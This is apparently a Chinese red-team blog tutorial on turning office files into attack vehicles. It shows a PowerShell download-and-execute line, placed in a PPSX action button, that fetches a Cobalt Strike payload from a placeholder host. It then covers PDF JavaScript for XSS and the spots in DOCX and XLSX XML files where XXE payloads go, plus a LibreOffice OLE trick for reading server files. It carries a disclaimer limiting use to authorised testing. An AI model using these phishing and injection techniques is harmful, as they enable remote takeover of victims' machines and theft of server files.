做外贸网站市场分析,微博营销案例,建行手机网站,设计方案怎么讲解一、PPT钓鱼 简单制作一个用于钓鱼的PPTX文件
一般那种小白不知道PPT也能拿来钓鱼#xff0c;这里主要是借用PPT中的”动作按钮”, 我们在插入的地方#xff0c;选择“动作按钮” 然后在弹出的窗口处#xff1a; 比如填入上线CS的语句#xff1a;powershell.exe -nop -w …一、PPT钓鱼 简单制作一个用于钓鱼的PPTX文件
一般那种小白不知道PPT也能拿来钓鱼这里主要是借用PPT中的”动作按钮”, 我们在插入的地方选择“动作按钮” 然后在弹出的窗口处 比如填入上线CS的语句powershell.exe -nop -w hidden -c IEX ((new-objectnet.webclient).downloadstring(http://x.x.x.x:80/a)) 最后我们将ppt格式保存为ppsx格式打开即可上线 二、PDF在漏洞挖掘和红队中的一些攻击姿势
使用PDF进行XSS攻击【这个有点鸡肋只是一种思路】 一个也不算新的攻击点它的攻击场景其实说常见也常见说不常见也不常见如果在日常日站中能遇到一些站的文件上传允许上传PDF能在线解析上传的PDF用户可以在线浏览PDF文件的那么久可能存在XSS攻击漏洞废话不多说我们来制作一个恶意PDF文件方法如下 找一个PDF编辑器我这边用的是迅捷其他的编辑器应该是差不多点击左上角选择新建空白页 单机左侧的“页面“标签选择与之对应的页面缩略图然后从选项下拉菜单中选择“页面属性”命令 也可以在这个位置找到 在“页面属性”对话框单击“动作”标签再从“选择动作”下拉菜单中选择“运行 JavaScript”命令然后单击【添加】按钮弹出 JavaScript 编辑器对话框 在弹出的“JavaScript 编辑器”对话框中输入代码app.alert(‘XSS’); 我们保存后用浏览器打开这个pdf文件[] 三、使用Word文档进行XXE攻击
1、DOCX文档的构造 使用docx文档进行xxe攻击一般小白听都没听过就感觉很高级的赶脚其实ta的原理非常简单打过CTF比赛的小伙伴们应该都知道docx本质上是压缩包是把一堆xml文件按照一定格式压缩在一起 下图可以清晰的看到DOCX文档的实际构成 既然是xml文件我们知道xxe攻击的本质上就是后端在处理XML相关数据的时候也执行了我们的恶意XML语句那么我们可以把恶意语句嵌入到DOCX文档中的某些xml文件中想办法让网站触发 这个方法的关键点在于要去寻找那种网站本身可以阅读DOCX文档或者在线解析DOCX文档的功能一定绕不开解析DOCX文档里的XML文件所以那种网盘在线阅读DOCX文档、网站在线解析DOCX文档、邮件系统传输DOCX文档等等功能都有可能存在这类漏洞下面讲讲利用姿势 第一个回显位置 这个位置在word/document.xml文件中 把它打开后发现是这样的 第一个位点在文档声明的下方也就是这个位置 可以嵌入恶意代码比如 然后将这个压缩包的后缀改为DOCX就获得了一个用于xxe攻击的DOCX文档 第二个回显位置 这个功能点所处的位置是docProps/app.xml 可以清楚的看到控制页码的标签是 在Pages标签中嵌入XXE攻击语句即可 然后和上面一样将这个压缩包的后缀名修改为DOCX就得到了一个用于xxe攻击的DOCX文档 2、利用Word OLE功能进行XXE攻击 这个手法主要用于攻击LibreofficeLibreoffice是很多Word转PDF网站的常客实战情况下有机会遇到 先创建一个OLE对象 选择由文件创建 这个文件名的绝对路径可以自己填插入好之后将这个文档先保存为.odt格式 然后老样子把它后缀改为.zip格式再修改其中的XML文件在content.xml中找到第一个xlink:href 其中的路径修改为你想要读的文件 最后把它重新改成Docx格式即可
四、使用Excel文档来进行XXE攻击
使用Excel文档进行XXE攻击的原理基本与Word文档进行攻击的原理一致Excel文档也是由XML文件按照一定的格式压缩在一起的。它们的输出位点也非常相似把xlxs文档后缀改为zip找到xl/workbook.xml文件。 同样在XML声明行的下面有一个输出位点 填入恶意语句 将压缩包后缀重新改回xlxs文件即可得到一个恶意Excel文件 申明本账号所分享内容仅用于网络安全技术讨论切勿用于违法途径所有渗透都需获取授权违者后果自行承担与本号及作者无关请谨记守法。
免费领取安全学习资料包
渗透工具 技术文档、书籍 面试题
帮助你在面试中脱颖而出 视频
基础到进阶
环境搭建、HTMLPHPMySQL基础学习信息收集SQL注入,XSSCSRF暴力破解等等 应急响应笔记 学习路线